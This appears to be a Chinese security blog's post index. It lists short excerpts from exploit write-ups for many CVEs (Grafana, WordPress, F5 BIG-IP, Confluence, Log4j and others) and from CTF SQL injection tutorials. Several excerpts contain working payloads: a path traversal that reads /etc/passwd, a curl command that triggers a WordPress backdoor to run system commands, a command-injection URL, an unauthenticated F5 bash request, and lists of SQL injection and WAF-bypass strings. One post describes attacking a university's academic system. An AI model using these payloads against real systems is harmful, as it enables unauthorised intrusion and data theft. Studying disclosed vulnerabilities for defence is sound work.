- 博客(24)
- 资源 (2)
- 收藏
- 关注
原创 (CVE-2022-30075) Tp-Link Archer AX50 Authenticated RCE
在Tp-Link路由器中进行身份验证的远程代码执行如果您的Tp-Link路由器具有备份和恢复功能,并且固件早于2022年6月,它可能很脆弱Tp-Link Archer AX50,其他tplink路由器可能会使用不同格式的备份,漏洞需要修改......
2022-06-13 10:09:17
1511
原创 CVE-2022-32275 Grafana 8.4.3
转到登录页面并在登录参数上输入payload : /dashboard/snapshot/*?orgId=0%20/invite/:
2022-06-07 23:20:26
690
原创 CVE-2022-32275 Grafana 8.4.3
CVE-2022-32275 Grafana 8.4.3 允许通过a /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd 来读取文件
2022-06-07 23:11:08
833
原创 CVE-2022-24288 Apache Airflow RCE POC/EXP
在 Apache Airflow 2.2.4 之前的版本中,一些示例 DAG 没有正确清理用户提供的参数,使其容易受到来自 Web UI 的 OS 命令注入的影响。这可以通过确保设置为来缓解。(payload1 2是俩个不同利用点,选择用一个就行)...
2022-06-06 19:15:05
1199
原创 Struts2 S2-062远程代码执行漏洞(CVE-2021-31805)复现
远程代码执行S2-062(CVE-2021-31805)由于Apache Struts2对S2-061(CVE-2020-17530)的修复不够完整,导致一些标签属性仍然可以执行 OGNL 表达式,攻击者利用该漏洞可以构造恶意数据远程执行任意代码。高危。受影响的版本:Struts 2.0.0 - Struts 2.5.29安全版本:Struts >= 2.5.30漏洞环境复用vulhub/struts2/s2-061/的docker环境,使用版本是struts2.5.25链接:vulhub/struts2/
2022-06-06 19:12:08
1486
原创 CVE-2022-29383 NETGEAR ProSafe SSL SQL注入漏洞
Firmware version: FVS336Gv2 - FVS336Gv3
2022-06-05 23:43:58
831
1
原创 CVE-2022-24990信息泄露 RCE漏洞
Terramaster TOS是中国铁威马(Terramaster)公司的一款基于Linux平台的,专用于erraMaster云存储NAS服务器的操作系统。 Terramaster TOS 4.2.29版本存在命令注入漏洞,该漏洞源于api.php脚本中的webNasIPS 组件中的输入验证不正确。未经身份验证的攻击者可以发送特殊数据利用该漏洞并在目标系统上执行任意命令。 TerraMaster TOS mobile.class.php文件的createRaid方法存在远程命令执行漏洞 ,攻击者配合 CVE
2022-06-05 17:47:21
2382
原创 Atlassian Confluence 远程代码执行/CVE-2022-26134
近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞(CVE-2022-26134)的安全公告。该漏洞的CVSS评分为10分,目前漏洞细节与PoC已被公开披露,且被检测到存在在野利用。 Atlassian Confluence是Atlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自...
2022-06-05 00:41:01
1064
原创 SQL注入Bypass WAF
Best WAF Bypass 1 :order by /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/UNION select/*!00000Union*/ /*!00000Select*//*!50000%55nIoN*/ /*!5000...
2022-06-01 10:24:07
3404
原创 SQL注入Payloads
Generic SQL Injection Payloads'''```,"""///\\\;' or "-- or # ' OR '1' OR 1 -- -" OR "" = "" OR 1 = 1 -- -' OR '' = ''=''LIKE''=0--+ OR 1=1' OR 'x'='x' AND id IS NULL; --'''''''''''''UNION SELECT '2%00/*…*/ + addition, concaten
2022-05-30 21:10:18
1108
原创 CVE-2022-1609 WordPress Weblizar Backdoor
$curl-s-d'blowfish=1'-d"blowf=system('id');"'http://localhost:8888/wp-json/am-member/license'uid=33(www-data)gid=33(www-data)groups=33(www-data)
2022-05-30 13:07:18
705
原创 CVE-2021-46422 SDT-CW3B1 1.1.0 - OS Command Injection
poc:hxxp://x.x.x.x/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id
2022-05-25 14:16:45
593
原创 CVE-2022-1388-EXP(F5-BIGIP)
简介F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。EXPPOST /mgmt/tm/util/bash HTTP/1.1Host: X-F5-Auth-Token: aAuthorization: Basic YWRtaW46Connection: keep-alive, x-F5-Auth-TokenContent-Length: 0Cache-Control: max-age=0{
2022-05-14 23:56:34
1097
原创 (CVE-2022-30525)Zyxel 防火墙未经身份验证的远程命令注入
前言该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。影响版本影响组件 固件版本USG FLEX 100, 100W, 200, 500, 700
2022-05-14 23:51:13
2172
原创 CTF-时间盲注专题
文章目录参考时间盲注Heavy QueryGet_lock()Rlikesleep2019hgame-week3-sqli2 `sleep`benchmark题pwnhub全宇宙最最简单的PHP博客系统 `Get_lock() Heavy Query`参考时间盲注Heavy Query个人认为这个方法是本题的最优解原理就如方法的名字:大负荷查询即用到一些消耗资源的方式让数据库的查询时间尽量变长而消耗数据库资源的最有效的方式就是让两个大表做笛卡尔积,这样就可以让数据库的查询慢下来而最后找到系统
2022-04-25 16:08:32
2763
原创 IDEA pom.xml爆红解决方案
好久不开IDEA,一打开全是爆红。想起之前切换了jdk,这里按要求更改一下以ysoserial为例打开pom全红尝试了一下右击reload几次还是不行,也尝试了Download Sources and Documentation,还是不行。然后我就去setting.xml更新了maven仓库 <mirror> <id>aliyunmaven</id> <mirrorOf>*</
2022-04-22 15:48:29
5082
2
原创 记录刚上大学的我是如何攻破教务系统(教务系统漏洞)
还想看什么,欢迎点赞评论留言回忆录:时间回到2018年某日:在别人都准备复习的时候,我默默打开学校门户系统这些快速导航的系统都是不需要再次验证的找了一圈没发现未授权漏洞,看来想搞事情可以先拿门户系统祭天了门户系统规则就是学号(工号)+身份证后六位不过你想拿到一个账号还是挺简单的,可以通过社工和学校的贴吧找到很多规则很多学校贴吧会放一些失物招领什么的(也会有一些失物招领的群)因为我有现成的账号,直接开搞吧我把门户系统所有功能点看了一遍,在用户设置处发现可控参数.
2022-01-14 21:14:20
7789
1
原创 PHP反序列化漏洞成因及漏洞挖掘技巧与案例
一、序列化和反序列化序列化和反序列化的目的是使得程序间传输对象会更加方便。序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串转换为对象供程序使用。在PHP中序列化和反序列化对应的函数分别为serialize()和unserialize()。反序列化本身并不危险,但是如果反序列化时,传入反序列化函数的参数可以被用户控制那将会是一件非常危险的事情。不安全的进行反序列化造成的危害只有你想不到,没有他做不到,是的,没错。序列化和反序列化的原理已经有很多文章
2022-01-02 13:23:36
1636
原创 OAuth安全相关问题
初识OAuth开放授权(OAuth)是一个开放标准,允许用户让第三方应用访问该用户在某一网站上存储的私密的资源(如照片,视频,联系人列表),而无需将用户名和密码提供给第三方应用.目前广泛使用的版本是OAuth 2.0.而OAuth2.0存在认证缺陷-即第三方帐号快捷登录授权可能被劫持。OAuth 2.0中有6种常用的授权类型:Authorization Code Implicit Password Client Credentials Device Code Refresh T..
2022-01-02 13:07:55
4676
2
原创 CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞(反弹shell)
本地复现https://github.com/tangxiaofeng7/apache-log4j-poclog4j.java内容import org.apache.logging.log4j.LogManager;import org.apache.logging.log4j.Logger;public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class);
2021-12-10 17:01:41
5375
原创 CTF入门之SQL注入
一、字符型注入<?phprequire_once('../header.php');require_once('db.php');$sql = "SELECT * FROM users where name = '";$sql .= $_GET['name']."'";$result = mysql_query($sql);if($result){ ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
2021-12-08 21:38:00
2358
原创 Centos7安装安全狗
下载安装包wget http://down.safedog.cn/safedog_linux64.tar.gz解压tar xzvf safedog_linux64.tar.gz cd safedog_an_linux64_2.8.21207/给安装文件足够权限chmod +x install.py开始安装./install.py报错翻译一下,需要禁用selinuxvim /etc/selinux/configSELINUX=disabled.
2021-12-08 21:18:45
1024
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人